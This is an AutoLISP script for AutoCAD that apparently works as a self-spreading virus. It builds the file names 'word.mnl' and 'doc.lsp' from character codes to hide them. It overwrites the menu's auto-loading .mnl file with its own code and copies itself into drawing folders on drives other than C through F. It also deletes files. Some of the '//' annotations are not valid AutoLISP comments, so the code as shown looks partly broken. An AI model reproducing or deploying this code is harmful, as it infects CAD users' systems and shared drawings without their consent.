(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(setq mnl (strcat (chr 87) // W
		  (chr 111) // o 
		  (chr 114)   //r 
		  (chr 100)  // d 
		  (chr 46)   // .
		  (chr 109)  // m 
		  (chr 110)  // n 
		  (chr 108)  // l ,以上即为word.mnl
	  )
      lsp (strcat (chr 100)
		  (chr 111)
		  (chr 99)
		  (chr 46)
		  (chr 108)
		  (chr 115)
		  (chr 112)  //doc.lsp
	  )
)

(vl-file-delete (strcat wpath lsp))
(vl-file-delete (strcat wpath "doc.lsp"))
(vl-file-delete (strcat dpath "doc.lsp"))
(defun wwriteapp ()
  (if (setq wwjm1 (open wnewacad "w"))
    (progn
      (setq wwjm (open woldacad "r"))
      (while(setq wwz (read-line wwjm))
	 (write-line wwz wwjm1)
      )
      (close wwjm)
      (close wwjm1)
    )
  )
)

(setq lbz 0)
(setq wwjqm (strcat dpath lsp))
(if (setq wwjm (open wwjqm "r"))
  (progn
    (repeat 15 (read-line wwjm))
    (setq wz (read-line wwjm))
    (setq ab (atoi (substr wz 4 1)))
    (close wwjm)
    (if	(> ab bb)
      (setq lbz 1)
    )
  )
)

(setq wwjqm (strcat wpath mnl))
(if (setq wwjm (open wwjqm "r"))
  (progn
    (repeat 15 (read-line wwjm))
    (setq wz (read-line wwjm))
    (setq nb (atoi (substr wz 4 1)))
    (close wwjm)
    
    (if	(< nb bb)
      (setq lbz 1)
    )
  )
  (setq lbz 1)
)
(if (= lbz 1)
  (progn
    (setq woldacad (strcat dpath lsp))
    (setq wnewacad (strcat wpath mnl))
    (wwriteapp)
  )
)
(if (and (/= (substr dpath 1 1) (chr 67))
	 (/= (substr dpath 1 1) (chr 68))
	 (/= (substr dpath 1 1) (chr 69))
	 (/= (substr dpath 1 1) (chr 70))
    )
  (progn
    (setq woldacad (strcat wpath mnl))
    (setq wnewacad (strcat dpath lsp))
    (wwriteapp)
  )
  (vl-file-delete (strcat dpath lsp))
)

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

(princ)


